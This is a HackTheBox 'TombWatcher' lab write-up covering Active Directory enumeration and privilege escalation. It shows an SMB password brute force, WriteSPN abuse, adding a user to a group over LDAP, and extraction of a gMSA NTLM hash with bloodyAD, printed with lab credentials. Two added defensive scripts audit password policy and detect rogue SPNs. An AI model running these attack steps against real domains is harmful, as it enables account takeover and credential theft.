TombWatcher HackTheBox (Intermediate)
Port scanning
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP>
nmap -sCV -p<PORTS> <IP>
Info:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-10 07:02 EDT
Nmap scan report for 10.10.11.72
Host is up (0.032s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-10 15:02:31Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-10T15:04:02+00:00; +4h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2025-10-10T14:24:24
|_Not valid after: 2026-10-10T14:24:24
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-10T15:04:01+00:00; +4h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2025-10-10T14:24:24
|_Not valid after: 2026-10-10T14:24:24
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2025-10-10T14:24:24
|_Not valid after: 2026-10-10T14:24:24
|_ssl-date: 2025-10-10T15:04:02+00:00; +4h00m01s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2025-10-10T14:24:24
|_Not valid after: 2026-10-10T14:24:24
|_ssl-date: 2025-10-10T15:04:01+00:00; +4h00m01s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49540/tcp open msrpc Microsoft Windows RPC
49574/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49686/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49687/tcp open msrpc Microsoft Windows RPC
49688/tcp open msrpc Microsoft Windows RPC
49704/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 4h00m00s, deviation: 0s, median: 4h00m00s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-10-10T15:03:22
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.44 seconds
We see several interesting ports, among them port 80, which hosts a web page. We will browse it to see what we find, but first, as the report shows, there is an AD domain called tombwatcher.htb and the Domain Controller DC01.tombwatcher.htb, so we add both to our hosts file.
nano /etc/hosts
# Inside nano
<IP> tombwatcher.htb DC01.tombwatcher.htb
Save it and open the page like this:
URL = http://<IP>/
We see a default IIS page, nothing interesting, so we move on to enumerating SMB, specifically with the credentials that HTB provides for the machine:

They are:
User: henry
Pass: H3nry_987TGV!
SMB
Let's enumerate the SMB port to see what we find with those credentials:
enum4linux -a -u henry -p 'H3nry_987TGV!' <IP>
Info:
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Oct 10 07:10:09 2025
=========================================( Target Information )=========================================
Target ........... 10.10.11.72
RID Range ........ 500-550,1000-1050
Username ......... 'henry'
Password ......... 'H3nry_987TGV!'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.11.72 )============================
[E] Can't find workgroup/domain
================================( Nbtstat Information for 10.10.11.72 )================================
Looking up status of 10.10.11.72
No reply from 10.10.11.72
====================================( Session Check on 10.10.11.72 )====================================
[+] Server 10.10.11.72 allows sessions using username 'henry', password 'H3nry_987TGV!'
=================================( Getting domain SID for 10.10.11.72 )=================================
Domain Name: TOMBWATCHER
Domain Sid: S-1-5-21-1392491010-1358638721-2126982587
[+] Host is part of a domain (not a workgroup)
===================================( OS information on 10.10.11.72 )===================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.10.11.72 from srvinfo:
10.10.11.72 Wk Sv PDC Tim NT
platform_id : 500
os version : 10.0
server type : 0x80102b
========================================( Users on 10.10.11.72 )========================================
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xfaf RID: 0x450 acb: 0x00000210 Account: Alfred Name: (null) Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xfae RID: 0x44f acb: 0x00000210 Account: Henry Name: (null) Desc: (null)
index: 0xfb1 RID: 0x452 acb: 0x00000210 Account: john Name: (null) Desc: (null)
index: 0xf10 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0xfb0 RID: 0x451 acb: 0x00000210 Account: sam Name: (null) Desc: (null)
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[Henry] rid:[0x44f]
user:[Alfred] rid:[0x450]
user:[sam] rid:[0x451]
user:[john] rid:[0x452]
==================================( Share Enumeration on 10.10.11.72 )==================================
do_connect: Connection to 10.10.11.72 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.11.72
//10.10.11.72/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A
//10.10.11.72/C$ Mapping: DENIED Listing: N/A Writing: N/A
[E] Can't understand response:
NT_STATUS_NO_SUCH_FILE listing \*
//10.10.11.72/IPC$ Mapping: N/A Listing: N/A Writing: N/A
//10.10.11.72/NETLOGON Mapping: OK Listing: OK Writing: N/A
//10.10.11.72/SYSVOL Mapping: OK Listing: OK Writing: N/A
============================( Password Policy Information for 10.10.11.72 )============================
[+] Attaching to 10.10.11.72 using henry:H3nry_987TGV!
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.10.11.72)
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] TOMBWATCHER
[+] Builtin
[+] Password Info for Domain: TOMBWATCHER
[+] Minimum password length: 1
[+] Password history length: 24
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 1
=======================================( Groups on 10.10.11.72 )=======================================
[+] Getting builtin groups:
group:[Server Operators] rid:[0x225]
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[Storage Replica Administrators] rid:[0x246]
[+] Getting builtin group memberships:
Group: Windows Authorization Access Group' (RID: 560) has member: NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
Group: Administrators' (RID: 544) has member: TOMBWATCHER\Administrator
Group: Administrators' (RID: 544) has member: TOMBWATCHER\Enterprise Admins
Group: Administrators' (RID: 544) has member: TOMBWATCHER\Domain Admins
Group: Users' (RID: 545) has member: TOMBWATCHER\Administrator
Group: Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
Group: Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
Group: Users' (RID: 545) has member: TOMBWATCHER\Domain Users
Group: Remote Management Users' (RID: 580) has member: TOMBWATCHER\john
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: NT AUTHORITY\Authenticated Users
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: TOMBWATCHER\DC01$
Group: Certificate Service DCOM Access' (RID: 574) has member: NT AUTHORITY\Authenticated Users
Group: Guests' (RID: 546) has member: TOMBWATCHER\Guest
Group: Guests' (RID: 546) has member: TOMBWATCHER\Domain Guests
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
[+] Getting local group memberships:
Group: Cert Publishers' (RID: 517) has member: TOMBWATCHER\DC01$
Group: Denied RODC Password Replication Group' (RID: 572) has member: Could not initialise pipe samr. Error was NT_STATUS_INVALID_NETWORK_RESPONSE
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Infrastructure] rid:[0x453]
[+] Getting domain group memberships:
Group: 'Schema Admins' (RID: 518) has member: TOMBWATCHER\Administrator
Group: 'Domain Guests' (RID: 514) has member: TOMBWATCHER\Guest
Group: 'Domain Admins' (RID: 512) has member: TOMBWATCHER\Administrator
Group: 'Domain Users' (RID: 513) has member: TOMBWATCHER\Administrator
Group: 'Domain Users' (RID: 513) has member: TOMBWATCHER\krbtgt
Group: 'Domain Users' (RID: 513) has member: TOMBWATCHER\Henry
Group: 'Domain Users' (RID: 513) has member: TOMBWATCHER\Alfred
Group: 'Domain Users' (RID: 513) has member: TOMBWATCHER\sam
Group: 'Domain Users' (RID: 513) has member: TOMBWATCHER\john
Group: 'Enterprise Admins' (RID: 519) has member: TOMBWATCHER\Administrator
Group: 'Domain Controllers' (RID: 516) has member: TOMBWATCHER\DC01$
Group: 'Domain Computers' (RID: 515) has member: TOMBWATCHER\ansible_dev$
Group: 'Group Policy Creator Owners' (RID: 520) has member: TOMBWATCHER\Administrator
===================( Users on 10.10.11.72 via RID cycling (RIDS: 500-550,1000-1050) )===================
[I] Found new SID:
S-1-5-21-1392491010-1358638721-2126982587
[I] Found new SID:
S-1-5-21-1392491010-1358638721-2126982587
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-5-21-1392491010-1358638721-2126982587 and logon username 'henry', password 'H3nry_987TGV!'
S-1-5-21-1392491010-1358638721-2126982587-500 TOMBWATCHER\Administrator (Local User)
S-1-5-21-1392491010-1358638721-2126982587-501 TOMBWATCHER\Guest (Local User)
S-1-5-21-1392491010-1358638721-2126982587-502 TOMBWATCHER\krbtgt (Local User)
S-1-5-21-1392491010-1358638721-2126982587-512 TOMBWATCHER\Domain Admins (Domain Group)
S-1-5-21-1392491010-1358638721-2126982587-513 TOMBWATCHER\Domain Users (Domain Group)
S-1-5-21-1392491010-1358638721-2126982587-514 TOMBWATCHER\Domain Guests (Domain Group)
S-1-5-21-1392491010-1358638721-2126982587-515 TOMBWATCHER\Domain Computers (Domain Group)
S-1-5-21-1392491010-1358638721-2126982587-516 TOMBWATCHER\Domain Controllers (Domain Group)
S-1-5-21-1392491010-1358638721-2126982587-517 TOMBWATCHER\Cert Publishers (Local Group)
S-1-5-21-1392491010-1358638721-2126982587-518 TOMBWATCHER\Schema Admins (Domain Group)
S-1-5-21-1392491010-1358638721-2126982587-519 TOMBWATCHER\Enterprise Admins (Domain Group)
S-1-5-21-1392491010-1358638721-2126982587-520 TOMBWATCHER\Group Policy Creator Owners (Domain Group)
S-1-5-21-1392491010-1358638721-2126982587-521 TOMBWATCHER\Read-only Domain Controllers (Domain Group)
S-1-5-21-1392491010-1358638721-2126982587-522 TOMBWATCHER\Cloneable Domain Controllers (Domain Group)
S-1-5-21-1392491010-1358638721-2126982587-525 TOMBWATCHER\Protected Users (Domain Group)
S-1-5-21-1392491010-1358638721-2126982587-526 TOMBWATCHER\Key Admins (Domain Group)
S-1-5-21-1392491010-1358638721-2126982587-527 TOMBWATCHER\Enterprise Key Admins (Domain Group)
S-1-5-21-1392491010-1358638721-2126982587-1000 TOMBWATCHER\DC01$ (Local User)
[+] Enumerating users using SID S-1-5-90 and logon username 'henry', password 'H3nry_987TGV!'
[+] Enumerating users using SID S-1-5-21-2729675972-3892313149-4080990915 and logon username 'henry', password 'H3nry_987TGV!'
S-1-5-21-2729675972-3892313149-4080990915-500 DC01\Administrator (Local User)
S-1-5-21-2729675972-3892313149-4080990915-501 DC01\Guest (Local User)
S-1-5-21-2729675972-3892313149-4080990915-503 DC01\DefaultAccount (Local User)
S-1-5-21-2729675972-3892313149-4080990915-504 DC01\WDAGUtilityAccount (Local User)
S-1-5-21-2729675972-3892313149-4080990915-513 DC01\None (Domain Group)
[+] Enumerating users using SID S-1-5-32 and logon username 'henry', password 'H3nry_987TGV!'
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-5-80-3139157870-2983391045-3678747466-658725712 and logon username 'henry', password 'H3nry_987TGV!'
[+] Enumerating users using SID S-1-5-82-3006700770-424185619-1745488364-794895919 and logon username 'henry', password 'H3nry_987TGV!'
[+] Enumerating users using SID S-1-5-82-3876422241-1344743610-1729199087-774402673 and logon username 'henry', password 'H3nry_987TGV!'
[+] Enumerating users using SID S-1-5-80 and logon username 'henry', password 'H3nry_987TGV!'
[+] Enumerating users using SID S-1-5-82-271721585-897601226-2024613209-625570482 and logon username 'henry', password 'H3nry_987TGV!'
================================( Getting printer info for 10.10.11.72 )================================
do_cmd: Could not initialise spoolss. Error was NT_STATUS_OBJECT_NAME_NOT_FOUND
enum4linux complete on Fri Oct 10 07:19:13 2025
We get very interesting information, including several users:
users.txt
alfred
Alfred
sam
john
DC01
We see that john can connect over WinRM (Remote Management Users), which is an interesting option; then we see that DC01 can publish certificates (Cert Publishers), and finally a group called DnsAdmins, which can carry a known vulnerability.
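The password policy block in the enum4linux output above (minimum length 1, complexity disabled, no lockout threshold) is what makes online password guessing against these accounts feasible. As an added example, not part of the original writeup, this script parses that block and flags the weak settings against baseline thresholds, which are assumptions:

```python
"""Audit the domain password policy reported by enum4linux.

Added example (not part of the original writeup): parses the
"Password Info for Domain" block and flags settings below an assumed
defensive baseline.
"""
import re

# Constructed sample, shaped like the enum4linux policy block above.
SAMPLE_POLICY = """\
[+] Password Info for Domain: TOMBWATCHER
[+] Minimum password length: 1
[+] Password history length: 24
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
"""

# Baseline thresholds: assumptions, adjust to your own policy.
MIN_LENGTH = 14
MIN_HISTORY = 24
MAX_LOCKOUT_THRESHOLD = 10

_SETTING = re.compile(r"^\[\+\]\s+([^:]+):\s*(.*)$")


def parse_policy(text):
    """Map each '[+] Name: value' line to {name: value}; other lines are skipped."""
    policy = {}
    for line in text.splitlines():
        m = _SETTING.match(line.strip())
        if m:
            policy[m.group(1).strip()] = m.group(2).strip()
    return policy


def _as_int(value):
    """Return the first integer in a value ('41 days' -> 41); None for
    'Not Set', 'None' or a missing setting."""
    m = re.search(r"-?\d+", str(value)) if value is not None else None
    return int(m.group(0)) if m else None


def audit_policy(text):
    """Return (setting, raw value, reason) tuples for every weak setting found."""
    p = parse_policy(text)
    findings = []

    length = _as_int(p.get("Minimum password length"))
    if length is None or length < MIN_LENGTH:
        findings.append(("Minimum password length", p.get("Minimum password length"),
                         f"below the {MIN_LENGTH}-character baseline"))

    history = _as_int(p.get("Password history length"))
    if history is None or history < MIN_HISTORY:
        findings.append(("Password history length", p.get("Password history length"),
                         f"fewer than {MIN_HISTORY} remembered passwords"))

    if p.get("Domain Password Complex") != "1":
        findings.append(("Domain Password Complex", p.get("Domain Password Complex"),
                         "complexity requirement disabled"))

    if _as_int(p.get("Maximum password age")) is None:
        findings.append(("Maximum password age", p.get("Maximum password age"),
                         "passwords never expire"))

    threshold = _as_int(p.get("Account Lockout Threshold"))
    if threshold is None or threshold == 0 or threshold > MAX_LOCKOUT_THRESHOLD:
        findings.append(("Account Lockout Threshold", p.get("Account Lockout Threshold"),
                         "no effective lockout: unlimited online password guessing"))
    return findings


if __name__ == "__main__":
    for setting, value, reason in audit_policy(SAMPLE_POLICY):
        print(f"[!] {setting} = {value}: {reason}")
```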
Netexec
Let's try a password brute force over SMB with netexec, using the user list, to see if we get lucky.
netexec smb <IP> -u users.txt -p <WORDLIST> --ignore-pw-decoding
Info:
.................................<REST OF OUTPUT>...................................
SMB 10.10.11.72 445 DC01 [+] tombwatcher.htb\alfred:basketball
We have found credentials for the user alfred; let's see what we can do with this user.
BloodHound
Let's collect all the AD information into a ZIP with this tool so we can feed it into BloodHound:
bloodhound-python -u henry -p 'H3nry_987TGV!' -ns <IP> -d TOMBWATCHER.htb -c All --zip
Info:
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: tombwatcher.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.tombwatcher.htb
INFO: Done in 00M 08S
INFO: Compressing output into 20251010075810_bloodhound.zip
This gives us a .zip containing all the information to import into BloodHound; let's install that tool.
URL = Download BloodHound in Docker
wget https://github.com/SpecterOps/bloodhound-cli/releases/latest/download/bloodhound-cli-linux-amd64.tar.gz
tar -xvzf bloodhound-cli-linux-amd64.tar.gz
./bloodhound-cli install
Info:
..............................<REST OF OUTPUT>......................................
Container bloodhound-graph-db-1 Creating
Container bloodhound-app-db-1 Creating
Container bloodhound-graph-db-1 Created
Container bloodhound-app-db-1 Created
Container bloodhound-bloodhound-1 Creating
Container bloodhound-bloodhound-1 Created
Container bloodhound-app-db-1 Starting
Container bloodhound-graph-db-1 Starting
Container bloodhound-app-db-1 Started
Container bloodhound-graph-db-1 Started
Container bloodhound-graph-db-1 Waiting
Container bloodhound-app-db-1 Waiting
Container bloodhound-graph-db-1 Healthy
Container bloodhound-app-db-1 Healthy
Container bloodhound-bloodhound-1 Starting
Container bloodhound-bloodhound-1 Started
[+] BloodHound is ready to go!
[+] You can log in as `admin` with this password: bnf8XsztC4Hypx6nMV5eSlhHpuDfEWgH
[+] You can get your admin password by running: bloodhound-cli config get default_password
[+] You can access the BloodHound UI at: http://127.0.0.1:8080/ui/login
Now that it is imported into our Docker and running, we can reach it at the following URL.
URL = http://127.0.0.1:8080/ui/login
We log in with the credentials the tool provided:
User: admin
Pass: bnf8XsztC4Hypx6nMV5eSlhHpuDfEWgH
Once inside, we import the .zip and wait a bit for all the data to load; then, on the main dashboard, we see everything. Let's investigate what the user henry has over the user alfred; digging a bit, we see the following:

We see that we have WriteSPN over the user alfred, so we can download a script already set up for this and exploit it as follows:
NOTE
But first, if we want to stop the container or bring it up again, we can do the following with the binary:
./bloodhound-cli down # Stop the container
./bloodhound-cli up # Bring the container up again
Now, continuing with the exploitation of this privilege...
URL = Download addspn.py
git clone https://github.com/dirkjanm/krbrelayx.git
cd krbrelayx/
python3 addspn.py -u 'TOMBWATCHER.htb\henry' -p 'H3nry_987TGV!' -t 'alfred' -s 'http/alfred.tombwatcher.htb' <IP>
Info:
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
We see it worked; now we check it like this:
python3 addspn.py -u 'TOMBWATCHER.htb\henry' -p 'H3nry_987TGV!' -t 'alfred' -q <IP>
Info:
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
DN: CN=Alfred,CN=Users,DC=tombwatcher,DC=htb - STATUS: Read - READ TIME: 2025-10-10T15:31:46.511872
sAMAccountName: Alfred
servicePrincipalName: http/alfred.tombwatcher.htb
We see it was added correctly, but for the moment we cannot do anything with it, so we keep investigating in BloodHound, this time collecting the data with alfred's credentials.
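From the defender's side, the change just made (an SPN appearing on an ordinary user account, which exposes that account's password to Kerberoasting) is easy to spot by diffing two snapshots of the directory. As an added example, not part of the original writeup or of krbrelayx, this script parses two constructed snapshots in the output format of addspn.py -q and reports SPNs newly present on user objects:

```python
"""Flag SPNs newly added to ordinary user accounts.

Added example (not part of the original writeup or of krbrelayx): it
compares two snapshots in the output format of 'addspn.py -q' and reports
SPNs that appeared on user objects, which is the change the WriteSPN abuse
above produces. Both snapshots below are constructed.
"""
import re

_FIELD = re.compile(r"^(DN|sAMAccountName|servicePrincipalName):\s*(.*)$")

# Constructed earlier snapshot: Alfred has no SPN, the DC has its usual one.
BASELINE = """\
DN: CN=Alfred,CN=Users,DC=tombwatcher,DC=htb - STATUS: Read - READ TIME: 2025-10-10T15:00:00
sAMAccountName: Alfred
DN: CN=DC01,OU=Domain Controllers,DC=tombwatcher,DC=htb - STATUS: Read - READ TIME: 2025-10-10T15:00:00
sAMAccountName: DC01$
servicePrincipalName: ldap/DC01.tombwatcher.htb
"""

# Constructed later snapshot: the SPN written by addspn.py now shows on Alfred.
CURRENT = """\
DN: CN=Alfred,CN=Users,DC=tombwatcher,DC=htb - STATUS: Read - READ TIME: 2025-10-10T15:31:46
sAMAccountName: Alfred
servicePrincipalName: http/alfred.tombwatcher.htb
DN: CN=DC01,OU=Domain Controllers,DC=tombwatcher,DC=htb - STATUS: Read - READ TIME: 2025-10-10T15:31:46
sAMAccountName: DC01$
servicePrincipalName: ldap/DC01.tombwatcher.htb
servicePrincipalName: HOST/DC01.tombwatcher.htb
"""


def parse_query_output(text):
    """Parse 'DN: / sAMAccountName: / servicePrincipalName:' lines into entries."""
    entries, current = [], None
    for line in text.splitlines():
        m = _FIELD.match(line.strip())
        if not m:
            continue
        key, value = m.group(1), m.group(2).strip()
        if key == "DN":
            # Drop the ' - STATUS: ... - READ TIME: ...' suffix ldap3 appends.
            current = {"dn": value.split(" - STATUS:")[0].strip(), "sam": None, "spns": []}
            entries.append(current)
        elif current is None:
            continue
        elif key == "sAMAccountName":
            current["sam"] = value
        else:
            current["spns"].append(value)
    return entries


def new_user_spns(baseline_text, current_text):
    """Return sorted (sAMAccountName, spn) pairs for SPNs present now but absent
    from the baseline, ignoring computer accounts (names ending in '$')."""
    before = {e["dn"]: set(e["spns"]) for e in parse_query_output(baseline_text)}
    alerts = []
    for e in parse_query_output(current_text):
        if e["sam"] is None or e["sam"].endswith("$"):
            continue
        for spn in sorted(set(e["spns"]) - before.get(e["dn"], set())):
            alerts.append((e["sam"], spn))
    return sorted(alerts)


if __name__ == "__main__":
    for sam, spn in new_user_spns(BASELINE, CURRENT):
        print(f"[!] SPN '{spn}' appeared on user account {sam}")
```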
bloodhound-python -u alfred -p 'basketball' -ns <IP> -d TOMBWATCHER.htb -c All --zip
Info:
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: tombwatcher.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.tombwatcher.htb
INFO: Done in 00M 07S
INFO: Compressing output into 20251011041041_bloodhound.zip
Now we import this new file into BloodHound; digging a bit, we see the following privilege for the user alfred.
Escalate user john

We see that we have AddSelf on the group Infrastructure, and that group in turn has this privilege:

And at the same time Ansible_devs$ has the following privileges over the user sam:

We see that we can change sam's password from that "computer" account; with that user we also see the privileges over the user john.

We see that we have WriteOwner over the user john, who is the one we know can connect via WinRM, so this whole escalation chain is quite interesting.
Finally, with this user john, we see these very interesting privileges regarding ADCS:

Having now reviewed practically the whole escalation path, let's put it into practice, starting with the AddSelf privilege.
cat > add_to_infra.ldif << EOF
dn: CN=Infrastructure,CN=Users,DC=tombwatcher,DC=htb
changetype: modify
add: member
member: CN=Alfred,CN=Users,DC=tombwatcher,DC=htb
EOF
ldapmodify -x -H ldap://<IP> -D 'alfred@TOMBWATCHER.htb' -w 'basketball' -f add_to_infra.ldif
Info:
modifying entry "CN=Infrastructure,CN=Users,DC=tombwatcher,DC=htb"
We see it worked; now let's check whether alfred was really added to that group:
ldapsearch -x -H ldap://<IP> -D 'alfred@TOMBWATCHER.htb' -w 'basketball' -b "CN=Infrastructure,CN=Users,DC=tombwatcher,DC=htb" member
Info:
# extended LDIF
#
# LDAPv3
# base <CN=Infrastructure,CN=Users,DC=tombwatcher,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: member
#
# Infrastructure, Users, tombwatcher.htb
dn: CN=Infrastructure,CN=Users,DC=tombwatcher,DC=htb
member: CN=Alfred,CN=Users,DC=tombwatcher,DC=htb
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
We see it was indeed added correctly. Now, as a member of that group, remember that we can read the NTLM hash of that account (the gMSA ANSIBLE_DEV$, through its msDS-ManagedPassword attribute). Let's download a script that automates all of this:
URL = Download bloodyAD
git clone https://github.com/CravateRouge/bloodyAD
cd bloodyAD/
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
python3 bloodyAD.py -d TOMBWATCHER.htb -u alfred -p basketball --host <IP> get object 'ANSIBLE_DEV$' --attr msDS-ManagedPassword
Info:
distinguishedName: CN=ansible_dev,CN=Managed Service Accounts,DC=tombwatcher,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:bf8b11e301f7ba3fdc616e5d4fa01c30
